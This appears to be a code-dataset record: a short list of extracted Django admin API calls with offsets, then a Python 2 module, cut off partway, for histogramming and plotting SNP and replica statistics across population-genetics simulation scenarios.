| [
"django.contrib.admin.site.register"
] | [((103, 128), 'django.contrib.admin.site.register', 'admin.site.register', (['User'], {}), '(User)\n', (122, 128), False, 'from django.contrib import admin\n'), ((129, 158), 'django.contrib.admin.site.register', 'admin.site.register', (['Category'], {}), '(Category)\n', (148, 158), False, 'from django.contrib import admin\n'), ((159, 189), 'django.contrib.admin.site.register', 'admin.site.register', (['WatchList'], {}), '(WatchList)\n', (178, 189), False, 'from django.contrib import admin\n'), ((291, 333), 'django.contrib.admin.site.register', 'admin.site.register', (['Listing', 'ListingAdmin'], {}), '(Listing, ListingAdmin)\n', (310, 333), False, 'from django.contrib import admin\n'), ((428, 470), 'django.contrib.admin.site.register', 'admin.site.register', (['Comment', 'CommentAdmin'], {}), '(Comment, CommentAdmin)\n', (447, 470), False, 'from django.contrib import admin\n'), ((589, 623), 'django.contrib.admin.site.register', 'admin.site.register', (['Bid', 'BidAdmin'], {}), '(Bid, BidAdmin)\n', (608, 623), False, 'from django.contrib import admin\n')] |
"""Flexible code for histogramming per-snp and per-replica statistics for selected SNPs in selected replicas in
selected scenarios and/or demographies."""
from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios
from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, \
MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff
from Classes.DotData import DotData
from Operations.Ilya_Operations.PipeRun.python.PipeRun import GetDependsOn
from Operations.Shari_Operations.localize.PopConsts import AllFreqs, AllPops, AllAges, CAUSAL_POS
from Operations.IDotData import IDotData
import operator, os, logging, contextlib, functools, collections, types, ast
from itertools import izip
import itertools, string
from UserDict import DictMixin
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as pp
import numpy as np
import math
import traceback as tb
__all__ = ( 'gatherCausalFreqs', 'DefineRulesTo_gatherCausalFreqs', 'histogramSnpStatistic', 'histogramReplicaStatistic',
'AddUpHistograms', 'GraphHistograms', 'GraphCumulPlots', 'DefineRulesTo_histogramSnpStatistic',
'DefineRulesTo_histogramReplicaStatistic', 'findReplicasMatchingConds', 'findSnpsMatchingConds',
'identifyReplicasMeetingConds', 'splitSnpStatsFile',
'DefineRulesTo_identifyReplicasMeetingCommonConds' )
def gatherCausalFreqs( scen, Ddata, simsOut, thinSfx, thinExt, nreplicas, getio = None ):
"""For all replicas within one scenario, gather some useful summary info for each replica:
e.g. that replica's modern-day frequency of the causal allele, the genetic map position of the
causal SNP, number of SNPs in the replica, the range of the genetic map, etc.
"""
#hm3big/simsOutHm3big/10ky/sel100_1/
simScenDir = Ddata + '/' + simsOut + thinSfx + '/' + scen.scenDir()
statScenDir = Ddata + '/replicastats' + thinSfx + '/' + scen.scenDir()
posFileNames = [ simScenDir + '/' + '%d_%s.pos-%d%s' % ( replicaNum, scen.scenName(), scen.mutPop, thinExt )
for replicaNum in range( nreplicas ) ] if not scen.is_neutral() else []
replicaInfoFileName = statScenDir + '/replicaStats.tsv'
if getio: return dict( depends_on = posFileNames, creates = replicaInfoFileName,
mediumRuleNameSfx = scen )
causalAlleleFreqs = [ ]
replicaNums = [ ]
selpos = 500000
okReplicas = 0
for replicaNum in range( nreplicas ):
if scen.is_neutral(): causalFreq = np.nan
else:
posFile = DotData( SVPath = posFileNames[ replicaNum ], SVSkipFirstLines = 1, SVHeader = False,
names = ['SNP','CHROM', 'CHROM_POS', 'ALLELE1', 'FREQ1', 'ALLELE2', 'FREQ2' ] )
causalLine = posFile[ posFile.CHROM_POS == selpos ]
assert len( causalLine ) == 1
causalFreq = causalLine[0].FREQ1
causalAlleleFreqs.append( causalFreq )
replicaNums.append( replicaNum )
DotData( names = [ 'replicaNum', 'causalAlleleFreq', 'targetCausalFreq' ],
Columns = [ replicaNums, causalAlleleFreqs,
(( 0 if scen.isNeutral() else scen.mutFreq),)*nreplicas ] ).saveToSV( replicaInfoFileName )
def gatherReplicaGDstats( scen, Ddata, simsOut, thinSfx, thinExt, nreplicas, getio = None ):
"""For all replicas within each scenario, gather some genetic map-related info for each replica:
e.g. the genetic map position of the
causal SNP, the range of the genetic map, etc.
"""
#hm3big/simsOutHm3big/10ky/sel100_1/
simScenDir = os.path.join( Ddata, simsOut + thinSfx, scen.scenDir() )
statScenDir = os.path.join( Ddata, 'replicastats' + thinSfx, scen.scenDir() )
posFileNames = [ simScenDir + '/' + '%d_%s.pos-%d%s' % ( replicaNum, scen.scenName(), scen.mutPop, thinExt )
for replicaNum in range( nreplicas ) ] if not scen.is_neutral() else []
replicaInfoFileName = statScenDir + '/replicaStats.tsv'
if getio: return dict( depends_on = posFileNames, creates = replicaInfoFileName,
mediumRuleNameSfx = scen )
causalAlleleFreqs = [ ]
replicaNums = [ ]
selpos = 500000
def DefineRulesTo_gatherCausalFreqs( pr, Ddata, simsOut = 'simsOut',
mutAges = AllAges, mutPops = AllPops, mutFreqs = AllFreqs,
thinSfx = '', thinExt = '', nreplicas = 100 ):
"""Define rules to gather per-replica statistics"""
for scen in GetScenarios( mutAges, mutPops, mutFreqs ):
pr.addInvokeRule( invokeFn = gatherReplicaStats,
invokeArgs = Dict( 'scen Ddata simsOut thinSfx thinExt nreplicas' ) )
# for compatibility with old code
gatherReplicaStats = gatherCausalFreqs
DefineRulesTo_gatherReplicaStats = DefineRulesTo_gatherCausalFreqs
def histogramSnpStatistic( Ddata, thinSfx, scenDir, replicaTables, replicaCond, snpTables, snpCond, snpStat,
outFile, nreplicas, binSize, binShift = 0.0, sfx = None, scenSfx = None, getio = None ):
"""Compute histogram of $snpStat for snps matching $snpCond in replicas matching $replicaCond in scenario $scenDir.
Params:
statTable - the name of the per-snp statistics table. we assume there is a file called
Ddata/snpstats/scenDir/statTable_pop.tsv for each scenario.
statCol - column name to histogram.
"""
replicaTables = MakeSeq( replicaTables )
snpTables = MakeSeq( snpTables )
replicaCondExpr = compile_expr( replicaCond )
snpCondExpr = compile_expr( snpCond )
snpStatExpr = compile_expr( snpStat )
outFile = AddFileSfx( outFile, sfx )
outFileStats = AddFileSfx( outFile, 'stats' )
if IsSeq( scenSfx ): scenSfx = dict( scenSfx )
replicaTableFiles = [ os.path.join( Ddata, 'replicastats' + thinSfx, scenDir,
replicaTable + ( '.tsv' if '.' not in replicaTable else '' ) )
for replicaTable in replicaTables ]
snpTableFiles = [ os.path.join( Ddata, 'snpStats' + thinSfx, scenDir,
AddFileSfx( snpTable + ( '.tsv' if '.' not in snpTable else '' ),
scenSfx if isinstance( scenSfx, types.StringTypes )
else scenSfx[ os.path.splitext( snpTable )[0] ] ) )
for snpTable in snpTables ]
#dbg('replicaTableFiles snpTableFiles')
#dbg('"*****" replicaTableFiles+snpTableFiles')
replicaTableFiles = [ f + '/' if f.endswith('.data') else f for f in replicaTableFiles ]
snpTableFiles = [ f + '/' if f.endswith('.data') else f for f in snpTableFiles ]
snpTables = [ os.path.splitext(snpTable)[0] for snpTable in snpTables ]
if getio: return dict( depends_on = replicaTableFiles + snpTableFiles,
creates = ( outFile, AddFileSfx( outFile, 'stats' ) ),
attrs = Dict( 'scenDir snpCond replicaCond snpStat' ),
mediumRuleNameSfx = ( scenDir, scenSfx ) )
replicaTableVals = [ DotData( SVPath = f ) for f in replicaTableFiles ]
replicasToUse = [ eval( replicaCondExpr, globals(), dict( zip( replicaTables, replicaTableRows ) ) )
for replicaTableRows in izip( *replicaTableVals ) ]
#dbg( 'sum(replicasToUse)' )
snpTableVals = [ IDotData( SVPath = f ) for f in snpTableFiles ]
histogramBuilder = Histogrammer( binSize = binSize, binShift = binShift )
lastReplica = np.nan
for snpTableRows in izip( *snpTableVals ):
r0 = snpTableRows[ 0 ]
assert all([ r.Chrom == r0.Chrom for r in snpTableRows ]) or all([ np.isnan( r.Chrom ) for r in snpTableRows ])
assert all([ r.Pos == r0.Pos for r in snpTableRows ])
replica = int( r0.Chrom ) if not np.isnan( r0.Chrom ) else -1
useThisReplica = not replicaTables or replicasToUse[ replica ]
if replica != lastReplica: dbg( 'replica useThisReplica histogramBuilder.getNumVals()' )
if useThisReplica:
snpDict = dict( zip( snpTables, snpTableRows ) )
if eval( snpCondExpr, globals(), snpDict ):
val = eval( snpStatExpr, globals(), snpDict )
histogramBuilder.addVal( val )
lastReplica = replica
logging.info('saving histogram to ', outFile )
histogramBuilder.save( outFile )
def histogramReplicaStatistic( Ddata, thinSfx, replicaCond, replicaStat,
outFile, nreplicas, binSize, scenCond = 'True',
replicaTables = None,
scen2sfxs = {}, allScens = GetScenarios(),
sfx = None, replicaCondSfx = '',
nameSfx = '', getio = None ):
"""Compute histogram of $replicaStat for replicas matching $replicaCond in scenarios matching $scenCond.
Saves the histogram as well as overall stats about the values of this statistic, e.g. the average.
Params:
statTable - the name of the per-snp statistics table. we assume there is a file called
Ddata/snpstats/scenDir/statTable_pop.tsv for each scenario.
statCol - column name to histogram.
"""
outFile = AddFileSfx( outFile, sfx, replicaCondSfx )
outFileStats = AddFileSfx( outFile, 'stats' )
args = Dict( 'Ddata thinSfx replicaTables scenCond replicaCond scen2sfxs allScens' )
if getio: return dict( depends_on =
findReplicasMatchingConds( getio = True, **args )[ 'depends_on' ],
creates = ( outFile, outFileStats ),
mediumRuleNameSfx = sfx, attrs = dict( piperun_short = True ),
name = 'histogramReplicaStatistic' + Sfx( nameSfx ) )
histogramBuilder = Histogrammer( binSize = binSize )
histogramBuilder.addVals( findReplicasMatchingConds( showHeadings = 'val', showVals = replicaStat, **args ).val )
histogramBuilder.save( outFile )
def histogramSnpStatistic2( Ddata, thinSfx, snpTables, snpCond, snpCondSfx, replicaTables, replicaCond, replicaStat,
outFile, nreplicas, binSize, scenCond = 'True',
scen2sfxs = {}, allScens = GetScenarios(),
sfx = None, replicaCondSfx = '',
nameSfx = '', getio = None ):
"""Compute histogram of $replicaStat for replicas matching $replicaCond in scenarios matching $scenCond.
Saves the histogram as well as overall stats about the values of this statistic, e.g. the average.
Params:
statTable - the name of the per-snp statistics table. we assume there is a file called
Ddata/snpstats/scenDir/statTable_pop.tsv for each scenario.
statCol - column name to histogram.
"""
outFile = AddFileSfx( outFile, sfx, replicaCondSfx, snpCondSfx )
outFileStats = AddFileSfx( outFile, 'stats' )
args = Dict( 'Ddata thinSfx snpTables snpCond replicaTables scenCond replicaCond scen2sfxs allScens' )
if getio: return dict( depends_on =
finSnpsMatchingConds( getio = True, **args )[ 'depends_on' ],
creates = ( outFile, outFileStats ),
mediumRuleNameSfx = sfx, attrs = dict( piperun_short = True ),
name = 'histogramReplicaStatistic' + Sfx( nameSfx ) )
histogramBuilder = Histogrammer( binSize = binSize )
histogramBuilder.addVals( findSnpsMatchingConds( showHeadings = 'val', showVals = snpStat, **args ).val )
histogramBuilder.save( outFile )
def AddUpHistograms( histFiles, outFile, getio = None ):
"""Add up histograms from separate files, write results to new file"""
outFileStats = AddFileSfx( outFile, 'stats' )
if getio: return dict( depends_on = histFiles, creates = ( outFile, outFileStats ),
attrs = dict( piperun_short = True ) )
sumHist = reduce( operator.add, map( Histogrammer.load, histFiles ) )
sumHist.save( outFile )
def GraphHistograms( histFiles, outFile = None, xlabel = '', ylabel = '', title = '',
labels = (), colors = 'brcmygkbrcmygkbrcmygkbrcmygk',
relWidth = 0.4,
xbound = None, ybound = None, coarsenBy = None, sfx = '',
ticksCoarsen = 1, log = False, normed = False,
cumulative = False,
cumulativeUpTo = None,
figSize = (24, 12 ),
subplots_adjust = {},
getio = None ):
"""Plot one or more histograms sharing the same bins.
Params:
normalizeHistograms - if true, for each histogram on the y-axis we plot not the number of
items in a given bin, but their fraction out of the total number of items in that histogram.
This lets us compare different histograms.
"""
#dbg( '"at_first" labels' )
# ( if the bins of one are strictly finer than bins of other, i.e. if they form a DAG in this
# relationship, then we can still do the graph).
histFiles = MakeSeq( histFiles )
if not outFile:
assert len( histFiles ) == 1
outFile = ReplaceFileExt( histFiles[0], '.png' )
outFile = AddFileSfx( outFile, sfx )
if not labels: labels = [ os.path.splitext( os.path.basename( f ) )[0] for f in histFiles ]
if getio: return dict( depends_on = histFiles, creates = outFile,
mediumRuleNameSfx = sfx,
attrs = dict( piperun_short = True ) )
pp.figure(1, figsize = figSize )
#pp.clf()
pp.subplots_adjust( **MergeDicts( dict( hspace = 0.3, bottom = 0.15 ), subplots_adjust ) )
for which, cumulative in enumerate( ( True, False ) ):
pp.subplot( 2, 1, which + 1 )
pp.xlabel( xlabel )
pp.ylabel( ylabel )
pp.hold( True )
binSize = None
binShift = None
theLabels = []
theHandles = []
hists = map( Histogrammer.load, histFiles )
if coarsenBy: hists = [ hist.coarsenBy( coarsenBy ) for hist in hists ]
allBinIds = reduce( operator.concat, [ hist.bin2count.keys() for hist in hists ] )
if not allBinIds: allBinIds = ( 0, )
minBinId = min( allBinIds )
maxBinId = max( allBinIds ) + 1
if cumulativeUpTo is not None:
maxBinId = min( maxBinId, max( [ hist.getCumulativeBinFor( cumulativeUpTo ) for hist in hists ] ) ) + 1
for color, label, ( histFileNum, hist ) in zip( colors, labels, enumerate( hists ) ):
# check that all histograms we're loading have the same bins
if binSize is None: binSize = hist.binSize
else: assert abs( hist.binSize - binSize ) < 1e-12
if binShift is None: binShift = hist.binShift
else: assert abs( hist.binShift - binShift ) < 1e-12
width = binSize * relWidth / len( histFiles )
left = np.array( hist.getAllBinLefts( minBinId = minBinId, maxBinId = maxBinId ) ) + histFileNum * width
if histFileNum == 0: pp.xticks( [ x for i, x in enumerate( left ) if i % ticksCoarsen == 0 ] )
height = hist.getAllBinCounts( normed = normed, cumulative = cumulative,
minBinId = minBinId, maxBinId = maxBinId )
rects = pp.bar( height = height,
width = width * 0.95, **Dict( 'left color log' ) )
if rects:
labelHere = label + ' (%d values)' % hist.getNumVals()
if hist.getNumNaNs(): labelHere += ' (%d nans)' % hist.getNumNaNs()
if hist.getNumInfs(): labelHere += ' (%d infs)' % hist.getNumInfs()
rects[ 0 ].set_label( labelHere )
theLabels.append( labelHere )
theHandles.append( rects[0] )
pp.title( title )
if theLabels and theHandles:
pp.figlegend( loc = 'lower center', labels = theLabels, handles = theHandles )
if xbound: pp.gca().set_xbound( *xbound )
if ybound: pp.gca().set_ybound( *ybound )
pp.savefig( outFile )
def GraphCumulPlots( histFiles, outFile = None, xlabel = '', ylabel = '', title = '',
labels = (), colors = 'brcmygkbrcmygkbrcmygkbrcmygk',
relWidth = 0.4,
xbound = None, ybound = None, coarsenBy = None, sfx = '',
ticksCoarsen = 1, log = False, normed = True,
getio = None ):
"""Plot one or more cumulative plots.
"""
# ( if the bins of one are strictly finer than bins of other, i.e. if they form a DAG in this
# relationship, then we can still do the graph).
histFiles = MakeSeq( histFiles )
if not outFile:
assert len( histFiles ) == 1
outFile = ReplaceFileExt( histFiles[0], '.png' )
if not labels: labels = [ os.path.splitext( os.path.basename( f ) )[0] for f in histFiles ]
outFileTable = outFile + '.points.tsv'
if getio: return dict( depends_on = histFiles, creates = ( outFile, outFileTable ),
mediumRuleNameSfx = sfx,
attrs = dict( piperun_short = True ) )
pp.figure(1, figsize = (18,6) )
#pp.clf()
pp.subplots_adjust( bottom = 0.37 )
pp.xlabel( xlabel + '\n\n\n\n' )
pp.ylabel( ylabel )
pp.hold( True )
binSize = None
theLabels = []
theHandles = []
for color, label, ( histFileNum, histFile ) in zip( colors, labels, enumerate( histFiles ) ):
hist = Histogrammer.load( histFile )
if coarsenBy: hist = hist.coarsenBy( coarsenBy )
if not binSize: binSize = hist.binSize
else:
if not abs( hist.binSize - binSize ) < 1e-12:
dbg( 'hist.binSize binSize hist.binSize-binSize' )
assert abs( hist.binSize - binSize ) < 1e-12
binLefts = hist.getBinLefts()
if histFileNum == 0: pp.xticks( [ x for i, x in enumerate( binLefts ) if i % ticksCoarsen == 0 ] )
binCounts = hist.getBinCounts( normed = normed, cumulative = True )
rects = pp.plot( binLefts, binCounts, label = label, color = color )
DotData( names = ( 'binLefts', 'binCounts' ), Columns = ( binLefts, binCounts ) ).saveToSV( outFileTable )
if rects:
theLabels.append( label )
theHandles.append( rects )
pp.title( title )
if theLabels and theHandles:
pp.figlegend( loc = 'lower center', labels = theLabels, handles = theHandles )
if xbound: pp.gca().set_xbound( *xbound )
if ybound: pp.gca().set_ybound( *ybound )
pp.savefig( outFile )
def DefineRulesTo_histogramSnpStatistic( pr, Ddata,
outFile, snpTables, snpStat, binSize,
binShift = 0.0,
scen2sfxs = lambda scen: '',
scenCond = 'True',
allScens = GetScenarios(),
nreplicas = 100, thinSfx = '', replicaTables = (),
replicaConds = 'True', replicaCondsSfxs = '',
snpConds = 'True', snpCondsSfxs = '', title = '', titlePrefix = '',
xlabel = '', ylabel = '',
xbound = None, ybound = None, log = False, coarsenBy = None, sfx = '',
ticksCoarsen = 1, cumulative = False, normed = False,
colors = 'brcmygkbrcmygkbrcmygkbrcmygk',
subplots_adjust = {},
name = None ):
"""A generic way to plot the distribution of some per-snp statistics for some subset of SNPs.
Params:
statTable - the name of the per-snp statistics table. we assume there is a file called
Ddata/snpstats/scenDir/statTable_pop.tsv for each scenario.
statCol - column name to histogram.
Notes:
- for histogramming should not need to load it all into memory. can do a pre-pass to just get
the range of values, define the bins, then do a second pass to count what goes in what bin.
could also add bins as we go. so, really just need to know bin size, and then can do all this
with one pass. can also, later, make this automatically parallelized.
"""
if not os.path.dirname( outFile ): outFile = os.path.join( Ddata, outFile )
scenCondExpr = compile_expr( scenCond )
replicaConds = MakeSeq( replicaConds )
replicaCondsSfxs = MakeSeq( replicaCondsSfxs )
snpConds = MakeSeq( snpConds )
snpCondsSfxs = MakeSeq( snpCondsSfxs )
totaledHistFiles = []
totaledLabels = []
outFile = AddFileSfx( outFile, sfx )
baseOutFile = outFile
for replicaCond, replicaCondSfx in zip( replicaConds, replicaCondsSfxs ):
for snpCond, snpCondSfx in zip( snpConds, snpCondsSfxs ):
histFiles = []
for scen in allScens:
if not eval( scenCondExpr, globals(), ScenAttrs( scen ) ): continue
scenDir = scen.scenDir()
for scenSfx in MakeSeq( scen2sfxs( scen ) if callable( scen2sfxs ) else scen2sfxs[ scen ] ):
histOutFile = os.path.join( Ddata, 'hist', scenDir,
AddFileSfx( ReplaceFileExt( os.path.basename( outFile ), '.tsv' ),
snpStat,
replicaCondSfx, snpCondSfx, scenSfx, sfx ) )
rule = pr.addInvokeRule( invokeFn = histogramSnpStatistic,
invokeArgs =
dict( outFile = histOutFile,
**Dict( 'Ddata thinSfx replicaTables replicaCond snpTables snpCond '
'snpStat nreplicas binSize binShift scenDir scenSfx sfx' ) ),
name = name,
comment = 'Compute distribution of ' + snpStat
+ ' for SNPs matching ' + snpCond + ' in replicas matching ' + replicaCond )
histFiles.append( histOutFile )
totaledHistFile = os.path.join( Ddata, 'hist',
AddFileSfx( ReplaceFileExt( os.path.basename( outFile ), '.tsv' ),
snpCondSfx, replicaCondSfx, sfx ) )
totaledHistFiles.append( totaledHistFile )
totaledLabel = ''
if replicaCondSfx:
totaledLabel += replicaCondSfx + ' replicas' + ( (' (' + replicaCond + ') ') \
if replicaCond != 'True' else '' )
if snpCondSfx: totaledLabel += snpCondSfx + ' SNPs' + ( (' (' + snpCond + ') ') \
if snpCond != 'True' else '' )
totaledLabels.append( totaledLabel )
pr.addInvokeRule( invokeFn = AddUpHistograms, invokeArgs = dict( histFiles = histFiles,
outFile = totaledHistFile ),
mediumRuleNameSfx = ( sfx, snpStat, replicaCondSfx, snpCondSfx ), name = 'AddUpSnpHists',
fileDescrs = { 0:
( 'Distribution of <b>' + snpStat + '</b> among '
+ ( 'all SNPs' if snpCond == 'True'
else ' snps matching <em>' + snpCond + '</em>' )
+ ' in '
+ ( 'all replicas' if replicaCond == 'True' else
'replicas matching <em>' + replicaCond + '</em>' )
+ ' in '
+ ( 'all scenarios' if scenCond == 'True' else
'scenarios matching <em>' + scenCond + '</em>' ),
( ( 'count', 'Number of SNPs with ' + snpStat + ' in given bin' ),) ) } )
if not title:
title = 'Histogram of ' + snpStat + '\n'
if scenCond != 'True': title += ' scenCond: ' + scenCond
if any( replicaCond != 'True' for replicaCond in replicaConds ):
title += ' replicaConds: ' + ', '.join(replicaCondsSfxs)
if any( snpCond != 'True' for snpCond in snpConds ): title += ' snpConds: ' + ', '.join(snpCondsSfxs)
title = titlePrefix + title
if not ylabel: ylabel = ('#' if not normed else 'fraction') + ' of snps'
if not xlabel: xlabel = snpStat
pr.addInvokeRule( invokeFn = GraphHistograms,
mediumRuleNameSfx = (snpStat,) + tuple(replicaCondsSfxs) + tuple(snpCondsSfxs),
name = 'GraphSnpHists',
invokeArgs = dict( histFiles = totaledHistFiles, labels = totaledLabels,
**Dict( 'xlabel ylabel title xbound ybound coarsenBy log outFile '
'cumulative normed ticksCoarsen colors' ) ),
attrs = Dict( 'snpStat replicaConds snpConds scenCond subplots_adjust' ) )
def DefineRulesTo_histogramReplicaStatistic( pr, Ddata,
outFile, replicaStat, binSize,
scenCond = 'True',
replicaTables = None,
sfx = '',
scen2sfxs = lambda scen: '',
allScens = tuple( GetScenarios() ),
nreplicas = 100, thinSfx = '',
replicaConds = 'True', replicaCondsSfxs = '',
title = '', titlePrefix = '',
xlabel = '', ylabel = '',
xbound = None, ybound = None, log = False, coarsenBy = None,
ticksCoarsen = 1, cumulative = False, normed = False,
cumulativeUpTo = 0.99,
subplots_adjust = {},
name = None, nameSfx = '' ):
"""Define rules to plot the distribution of a specified per-replica statistic for some subsets of replicas
in some subset of scenarios.
Params:
pr - the PipeRun object to which the rules should be added
Ddata - the root folder of the genetic data in simulations format
outFile - the filename to which the histogram plot will be written
replicaTables - names of tables containing per-replica values. For each such table T,
there must be a file of the form os.path.join( Ddata, replicastats, scenario.scenDir(), T + '.tsv' )
giving some values for each replica in the scenario.
replicaStat - a Python expression in which the names in replicaTables may appear as variables, and refer
to a named tuple representing the replica's row in the corresponding replicaTable.
Notes:
- for histogramming should not need to load it all into memory. can do a pre-pass to just get
the range of values, define the bins, then do a second pass to count what goes in what bin.
could also add bins as we go. so, really just need to know bin size, and then can do all this
with one pass. can also, later, make this automatically parallelized.
"""
if not os.path.dirname( outFile ): outFile = os.path.join( Ddata, outFile )
scenCondExpr = compile_expr( scenCond )
ourScens = [ scen for scen in allScens if eval( scenCondExpr, globals(), ScenAttrs( scen ) ) ]
if callable( scen2sfxs ):
scen2sfxs = dict( ( scen, scen2sfxs( scen ) ) for scen in ourScens )
replicaConds = MakeSeq( replicaConds )
replicaCondsSfxs = MakeSeq( replicaCondsSfxs )
totaledHistFiles = []
totaledLabels = []
for replicaCond, replicaCondSfx in zip( replicaConds, replicaCondsSfxs ):
totaledHistFile = os.path.join( Ddata, 'hist',
ReplaceFileExt( os.path.basename( outFile ), '.tsv' ) )
totaledLabels.append( replicaCondSfx + ': ' + replicaCond )
r = pr.addInvokeRule( invokeFn = histogramReplicaStatistic,
invokeArgs = Dict( 'Ddata thinSfx replicaTables replicaCond replicaStat nreplicas '
'binSize scenCond scen2sfxs allScens nameSfx sfx replicaCondSfx',
outFile = totaledHistFile ),
mediumRuleNameSfx = ( replicaStat, replicaCondSfx, sfx ),
fileDescrs = { 0:
( 'Distribution of <b>' + replicaStat + '</b> among '
+ ( 'all replicas' if replicaCond == 'True' else
'replicas matching <em>' + replicaCond + '</em>' )
+ ' in '
+ ( 'all scenarios' if scenCond == 'True' else
'scenarios matching <em>' + scenCond + '</em>' ),
( ( 'count', 'Number of replicas with ' + replicaStat +
' in given bin' ),
)) } )
totaledHistFiles.append( r.creates[0] )
if not title:
if scenCond != 'True': title += ' scenCond: ' + scenCond
if len( replicaConds ) == 1 and replicaConds[0] != 'True': title += ' replicaCond: ' + replicaConds[0]
title = titlePrefix + title
if not ylabel: ylabel = ('#' if not normed else 'fraction') + ' of replicas'
if not xlabel: xlabel = replicaStat
pr.addInvokeRule( invokeFn = GraphHistograms,
invokeArgs = dict( histFiles = totaledHistFiles, labels = totaledLabels,
**Dict( 'xlabel ylabel title xbound ybound coarsenBy log outFile '
'sfx ticksCoarsen cumulative normed cumulativeUpTo' ) ),
name = 'GraphReplicaHists' + Sfx( nameSfx ),
mediumRuleNameSfx = ( replicaStat, sfx ) + tuple( replicaConds ),
attrs = Dict( 'replicaStat sfx subplots_adjust' ) )
return totaledHistFiles
def identifyReplicasMeetingConds( Ddata, scenario, replicaTables, replicaConds, condsFileFN, nreplicas,
thinSfx = '', getio = None ):
"""Given a list of named replica conditions, determine for each replica which conditions it meets, and
write out the result in an easy-to-access format.
Input params:
replicaConds - sequence of pairs of the form ( condName, cond ) -- for example,
( ( 'hi', 'replicaStats.causalAlleleFreq >= .5' ), ( 'lo', 'replicaStats.causalAlleleFreq < .5' ) )
"""
replicaTables = MakeSeq( replicaTables )
replicaTableFiles = [ os.path.join( Ddata, 'replicastats' + thinSfx, scenario.scenDir(),
replicaTable + ( '.tsv' if not os.path.splitext( replicaTable )[1] else '' ) )
for replicaTable in replicaTables ]
if not os.path.dirname( condsFileFN ): condsFileFN = os.path.join( Ddata, 'replicastats' + thinSfx, scenario.scenDir(),
condsFileFN )
if getio: return dict( depends_on = replicaTableFiles, creates = condsFileFN, mediumRuleNameSfx = scenario.scenDir(),
attrs = dict( piperun_short = True,
condNames = ', '.join( map( operator.itemgetter( 0 ), replicaConds ) ) ) )
replicaTableVals = [ DotData( SVPath = f ) for f in replicaTableFiles ]
assert all([ len( replicaTableVal ) == nreplicas for replicaTableVal in replicaTableVals ])
matchingReplicas = []
for replicaCond in map( operator.itemgetter( 1 ), replicaConds ):
replicaCondExpr = compile_expr( replicaCond )
replicasToUse = [ int( eval( replicaCondExpr, globals(), dict( zip( replicaTables, replicaTableRows ) ) ) )
for replicaTableRows in izip( *replicaTableVals ) ]
matchingReplicas.append( replicasToUse )
Records = []
condNames = tuple( map( operator.itemgetter( 0 ), replicaConds ) )
for replicaNum, condResults in enumerate( izip( *matchingReplicas ) ):
Records.append( ( replicaNum, ','.join( replicaCondName for condNum, replicaCondName
in enumerate( condNames )
if condResults[ condNum ] ) )
+ condResults )
IDotData( names = ( 'replicaNum', 'matchingConds' ) + condNames, Records = Records ).save( condsFileFN )
def DefineRulesTo_identifyReplicasMeetingCommonConds( pr, Ddata, thinSfx = '', allScens = GetSelectionScenarios(),
nreplicas = 100 ):
"""Define rules to identify replicas meeting common conditions such as all/lo/hi freq"""
for scenario in allScens:
pr.addInvokeRule( invokeFn = identifyReplicasMeetingConds,
invokeArgs = Dict( 'Ddata scenario nreplicas thinSfx',
replicaTables = ( 'replicaStats', ),
replicaConds = ( ( 'all', 'True' ),
( 'hi', 'replicaStats.causalAlleleFreq >= .5' ),
( 'lo', 'replicaStats.causalAlleleFreq < .5' ) ),
condsFileFN = 'commonReplicaConds.tsv' ) )
def splitSnpStatsFile( Ddata, scenario, inFileFN, condsFileFN, condNames, thinSfx = '',
replicaColName = 'Chrom', sfx = '', getio = None ):
"""Split a file containing per-snp data for all replicas, into separate files containing the same data for each
kind of replica."""
if not os.path.dirname( inFileFN ): inFileFN = os.path.join( Ddata, scenario.scenDir(), inFileFN )
if not os.path.dirname( condsFileFN ):
condsFileFN = os.path.join( Ddata, 'replicastats' + thinSfx, scenario.scenDir(), condsFileFN )
outFileFNs = [ AddFileSfx( inFileFN, sfx, condName ) for condName in condNames ]
if getio: return dict( depends_on = ( inFileFN, condsFileFN ),
creates = outFileFNs, mediumRuleNameSfx = scenario.scenDir() )
condsFile = IDotData( condsFileFN )
inFile = IDotData( inFileFN )
with contextlib.nested( *map( functools.partial( IDotData.openForWrite, headings = inFile.headings ),
outFileFNs ) ) as outFiles:
for (replica, replicaRows), condValues in izip( inFile.groupby( replicaColName, multiPass = False ), condsFile ):
assert condValues.replicaNum == replica
# if this replica matches more than one condition, save the replica rows so we can iterate over them more
# than once
if sum( condValues[ condNames ] ) > 1: replicaRows = tuple( replicaRows )
for condName, outFile in zip( condNames, outFiles ):
if condValues[ condName ]: outFile.writeRecords( replicaRows )
def joinSnpStatsFiles( Ddata, scenario, outFileFN, condNames, condsFileFN, thinSfx = '',
replicaColName = 'Chrom', sfx = '', getio = None ):
"""Join several per-snp stats files, each containing data for some of the replicas,
into a single file containing data for all the replicas.
"""
if not os.path.dirname( outFileFN ): outFileFN = os.path.join( Ddata, scenario.scenDir(), outFileFN )
if not os.path.dirname( condsFileFN ): condsFileFN = os.path.join( Ddata, 'replicastats' + thinSfx, scenario.scenDir(),
condsFileFN )
inFileFNs = [ AddFileSfx( outFileFN, sfx, condName ) for condName in condNames ]
if getio: return dict( depends_on = [ condsFileFN ] + inFileFNs, creates = outFileFN,
mediumRuleNameSfx = scenario.scenDir() )
inFiles = map( IDotData, inFileFNs )
dbg( 'inFiles' )
condsFile = IDotData( condsFileFN )
groupIters = [ inFile.groupby( replicaColName ) for inFile in inFiles ]
def getBlocks():
for r in condsFile:
for condName, groupIter in zip( condNames, groupIters ):
if r[ condName ]:
replicaNum, replicaRows = next( groupIter )
assert replicaNum == r.replicaNum
yield replicaRows
break
IDotData.vstackFromIterable( getBlocks() ).save( outFileFN )
def ScenAttrs( scen ):
"""Make a dictionary describing the attributes of a scenario"""
scenAttrs = dict( scen = scen, is_neutral = scen.is_neutral(), isNeutral = scen.isNeutral() )
if not scen.is_neutral(): scenAttrs.update( mutAge = scen.mutAge,
mutPop = scen.mutPop,
mutFreq = scen.mutFreq )
return scenAttrs
def scatterPlotReplicaStatistic( Ddata, nreplicas, replicaStatX,
replicaStatY,
outFile,
thinSfx = '',
scenCond = 'True',
replicaTables = (), replicaCond = 'True',
replicaColorings = (),
replicaDefaultColor = 'b',
replicaShow = None,
allScens = tuple( GetScenarios() ), nameSfx = '',
scen2sfxs = {},
title = '', subtitle = '',
highlightScen = None, highlightReplica = None,
